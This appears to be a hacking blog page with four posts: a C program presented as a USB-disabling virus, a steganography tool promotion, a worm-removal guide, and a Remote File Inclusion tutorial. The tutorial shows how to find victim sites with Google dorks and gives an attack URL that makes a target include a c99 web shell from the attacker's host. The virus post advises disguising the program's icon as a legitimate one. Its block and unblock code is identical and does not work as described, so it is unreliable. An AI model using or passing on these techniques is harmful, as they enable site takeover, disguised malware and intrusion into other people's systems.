Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Disable USB Ports : Virus Source Code


In this post I will show how to create a simple virus that disables/blocks the USB ports on the computer (PC). As usual I use my favorite C programming language to create this virus. Anyone with a basic knowledge of C language should be able to understand the working of this virus program.


Once this virus is executed it will immediately disable all the USB ports on the computer. As a result the you’ll will not be able to use your pen drive or any other USB peripheral on the computer. The source code for this virus is available for download. You can test this virus on your own computer without any worries since I have also given a program to re-enable all the USB ports.

1. Copy the below Given Code in Notepad & Save it as "block_usb.c"


#include<stdio.h>
void main()
{
system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\USBSTOR \/v Start \/t REG_DWORD \/d 3 \/f");
}

2. Again Copy the below Given Code in Notepad & Save it as "unblock_usb.c"


#include<stdio.h>
void main()
{
system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\USBSTOR \/v Start \/t REG_DWORD \/d 3 \/f");
}

3. Compile the Above two saved files using a C Compiler before you can run it. 
4. Upon compilation of block_usb.c you get block_usb.exe which is a simple virus that will block (disable) all the USB ports on the computer upon execution (double click).
5. To test this virus, just run the block_usb.exe file and insert a USB pen drive (thumb drive). Now you can see that your pen drive will never get detected. To re-enable the USB ports just run the unblock_usb.exe  (you need to compile unblock_usb.c) file. Now insert the pen drive and it should get detected.
6. You can also change the icon of this file to make it look like a legitimate program.

Hope you would have Liked it. Do post back your comments over it. :) :)

Posted By :- |-|A|_F B|_00d Pr|nCe 

How to Hide Data in Image, Audio & Video Files: Steganography


Ever wondered to know how to hide secret messages in images, audio and video files? Well, in this post I will take you through a concept called steganography using which, it is possible to hide your secret information in image files, songs or any other file of your choice. At the end of this post, you can also download free stegnographic tools and start hiding your data.


What is Steganography?

Steganography is a means of obscuring data where secret messages are hidden inside computer files such as images, sound files, videos and even executable files so that, no one except the sender and the receiver will suspect the existence of stealth information in it. Steganography may also involve the usage of cryptography where the message is first encrypted before it is concealed in another file. Generally, the messages appear to be something else such as an image, sound or video so that the transfer of secret data remains unsuspected.
The main advantage of steganography over other methods such as cryptography is that, it will not arose suspicion even if the files fall in the hands of a third party. Unlike cryptographic messages, stegnographic messages will no way attract the attention of a third party by themselves. Thus stegnanography has an upper hand over cryptography as it involves both encryption and obscurity.

What are the Applications of Steganography?

Steganography is mainly used to obscure confidential information/data during storage or transmission. For example, one can hide a secret message in an audio file and send this to another party via email instead of sending the message in the textual format. The receiver on the other end will decrypt the hidden message using the private decryption key. In a worst case scenario, even if a third party does manage to gain access to the email, all he can find is the audio file and not the hidden data inside it. Other usage of steganography include digital watermarking of images for reasons such as copyright protection.
Eventhough steganography has many useful applications, some may use this technique for illegitimate purposes such as hiding a pornographic content in other large files. Roumors about terrorists using steganography for hiding and communicating their secret information and instructions are also reported. An article claiming that, al-Queda had used steganography to encode messages in images and transported them via e-mails, was reported by New York Times, in October 2001.

How do Steganography Tools Work?

Stegnography tools implement intelligent algorithms to carefully embed the encrypted text messages or data inside other larger files such as an image, audio, video or an executable file. Some tools will embed the encrypted data at the end of another file so that there will be enough room for storing larger data.
There are many steganography tools available online but only a few are able to work flawlessly. I did not find any tool that worked perfectly on both small and large data. However I have  managed to develop my own tool that can work perfectly on all types of files and all size of data. The tool is called “Stego Magic“. You can download it from the following link.


The zip file contains two versions of Stego Magic: One for encrypting the text messages and the other for encrypting binary files. StegoMagic_TXT can be used to hide text messages in other files such as an image or a sound file. StegoMagic_BIN can be used to hide one binary file in another such as an executable file inside an image or an image inside a video file.
With Stego Magic, there is no limitation on the size and type of the file that you are intending to hide. For example, you can hide a video of size 1 GB in an image of size 1 MB or hide an executable file inside a WORD document. The tool is pretty straightforward to use and requires no special understanding of the concept.
At the end of the encryption process, a secret decryption key will be generated and the same is required during the decryption process.


How to Use Stego Magic?

Suppose you want to hide a text message inside a JPG file:
1. Place the JPG and the text file (.txt) in the same folder as that of StegoMagic_TXT.exe
2. Run StegoMagic_TXT.exe and follow the screen instructions to embed the text message inside the JPG image.
3. Note down the secret decryption key.
Now you can send this image to your friend via email. To decrypt the hidden message, your friend should load this JPG file onto the Stego Magic tool and use the secret decryption key.

Posted By :- |-|A|_F B|_00d Pr|nCe 

Remove REGSVR.EXE and New Folder.exe viruses completely


Plug a pendrive into a public computer and you will be pesked by the continuously replicating “New Folder.exe” virus or the “regsvr.exe” virus. Hear my story, while I transferred my notes last night (around 600 folders) and I was surprised to  see that around 450 MB of space was eaten by these self replicating space eaters ! I was running Linux so these were not a concern for me, but when I plugged my pendrive into my virtual machine (windows xp sp2), it caused multiple problems of explorer corruption and disabling registry tools.

Time for some virus busting I guess..here is how you can remove “regsvr.exe” and “new folder.exe” from your computer.

Step 1 - Some Startup Repairs
First of all, boot into safe mode.After you get to your desktop,press F3 or Ctrl + F and search for “autorun.inf” file in your computer and delete all the subsequent files. I case you are no able to delete them, select all the files and uncheck the”Read Only” option. If you are still not able to delete them , you might want to try out Unlocker tool todelete the files.
Now go to
start – > run –> type ”msconfig”
and press enter
Go to startup tab and uncheck “regsvr”, click ok and then click on “Exit without restart”.
Now go to
control panel –> scheduled tasks and delete “At1” task listed there.
Once done, close all windows.

Step 2 - Changing Configurations
Your registry might be disabled,and you need to activate it back to undo all the malicious changes done by worm.In order to do that, you need to go to
start – > run –> type ”gpedit.msc”
and press enter
then navigate to
users configuration –> Administrative templates –> systems
Find “prevent access to registry editing tools” , double click it and change the option to disable.

Once done, your Regedit will be enabled. In case your task manager is disabled, you need to enable it.

Step 3 - Registry Edits
Now we have to perform some registry edits to enable our explorer and to remove all instances of worm from the registry. Go to
start – > run –> type ”regedit”
and press enter
Click on Edit –> Find and search for regsvr.exe . Find and delete all the occurrences of regsvr.exe virus (don't delete  regsvr32.exe as its not a virus).
then navigate to entry
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
and modify the entry
Shell = “Explorer.exe regsvr.exe”

to delete the regsvr.exe from it,so that it becomes
Shell = “Explorer.exe”
Once done, close all windows and get ready to delete all virus files.

Step 4 - Deleting Virus Files
The final step is to delete all the virus files in your computer. To do this, Press F3 or Ctrl + F and search for regsvr.exe (make sure to search in hidden folders ) and delete all “regsvr.exe” “svchost .exe” files (notice the gap between ‘svchost’ and ‘.exe’, keep in mind you don't delete the legitimate file.).
Clean your recycle bin and restart your PC (perform a cold boot).
Volia..you have cleaned your computer from regsvr..just make sure to scan your pendrive the next time you plug in :)

Posted By :- |-|A|_F B|_00d Pr|nCe 

WEBSITE HACKING: REMOTE FILE INCLUSION

REMOTE FILE INCLUSION (RFI)

Remote file inclusion (RFI) is a very common vulnerability found in most of the websites. Remote file inclusion allows the attacker to upload a script or malicious code in a website or server. Using this attack, we can exploit"dynamic file include" mechanisms in web applications. when web applications take user input(such as url, parameter values etc) and pass them into file include commands, the website can be tricked into including remote files with malicious code.using RFI you can deface the vulnerable websites, get access to the server or even you can manipulate of the response sent to the client of the website. For example you can embed a JavaScript code to steal the client cookie session.

PHP is particularly vulnerable to RFI attacks due to the extensive use of "file includes" in PHP programming. The vulnerability mainly relies on the PHP include () function. So you need to know some basic php concepts for better understanding of this attack. A include() function is used to include or evaluate a specified file. Actually the php code responsible for this vulnerability will be in a format similar as stated below:

Thus If this isn't coded properly, the script doesn't check where the file is coming from and so an inclusion from another site will be accepted and run on the server. This means that a text file containing PHP script can be hosted on another site but run on the site being targeted.

Performing a RFI attack

1. First step is to find the vulnerable website

Remote File inclusion vulnerability usually occur in those sites which have a navigation similar to this:

www.victimwebsite.com/index.php?page=something

To find a vulnerable website, we will use Google dorks :

Go to google, and type the following:

Inurl:index.php?file=something

Or

Inurl:index.php?page=something

Or

Inurl:index.php?open=something

There are many more dorks for finding RFI vulnerable websites.

At the end you will find numerous websites similar to the address stated above. But remember, these are sites which may be prone to RFI attack. We have to check further that whether they are vulnerable or not.

So go to a particular website in which you want to test RFI attack . for example if your website’s url is: www.victimwebsite.com/index.php?file=anything

Replace the red colour text with http://google.com, so that the url of the target website would be same as: www.victimwebsite.com/index.php?file=http://google.com

Now as soon as you press enter,if google homepage is there in the website, it means the website is vulnerable to RFI attack.

EXPLOITING RFI VULNERABILITY

2. Now lets look how we can exploit RFI vulnerability .

This is where the concept of web shells come in. A web shell is a script that can handle simple tasks such as uploading, deleting and executing commands. The most common shell being the c99 but others are available such as the r57 and c100. This basically means that if you get a web shell to execute on an unprotected site, you will have full control over that site - and will be able to upload or delete any file you wish.

We will use c99 webshell to deploy our attack, you can download the c99 webshell from the link below:

C99 download link

Now you need to upload this webshell as a text file in your own website(attacker’s website) or in any webhost. After uploading if your url would be: www.mysite.com/c99.txt, then all you do is to simply put this link at the end of your vulnerable site. Thus the final string that will run the webshell is:

http://www.victimwebsite.com/index.php?file=http://www.mysite.com/c99.txt?

Note: the question mark should be at the end.

This will execute in the php as
include('http://www.site.com/c99.txt'); which includes the web shells script in the page.

Now if you succeds to run the web shell in vulnerable website, you will see a screen similar as below:

The shell will display information about the remote server and list all the files and directories on it. Now you are inside the website and you can do anything with it.

PROTECTION AGAINST RFI

If you still want to use index.php?file=, then use “switch” statement that defines the page before hand. A secure php code would be as below:

Or the best way is simply make sure that you are using up-to-date scripts, and make sure your server php.ini file has register_globals and allow_url_fopen disabled.

I personally don’t prefer any tool for penetration testing, but if you want to use a tool for RFI attack then,A tool called FIMAP is used to exploit Remote file inclusion. This is scripted in python language.

Read more:

http://code.google.com/p/fimap/

download the tool:

http://code.google.com/p/fimap/downloads/list

Sources: security papers from: www.exploit-db.com

http://en.wikipedia.org/wiki/Remote_file_inclusion

www.corelan.be

image source: www.hackforums.net

Well, that’s the end of the tutorial. Hope you have learnt something from this post. Your feedback will be useful for us.

!!!!ENJOY HACKING!!!

Posted by: DR34MHAXX

Older Posts Home

Followers

    !!!! LeTs ChAt !!!!

    AddThis

    Share |

    Hack'a'Holic

    Subscribe to hackaholicteam

    Powered by in.groups.yahoo.com

    Blog Archive

    Powered by Blogger.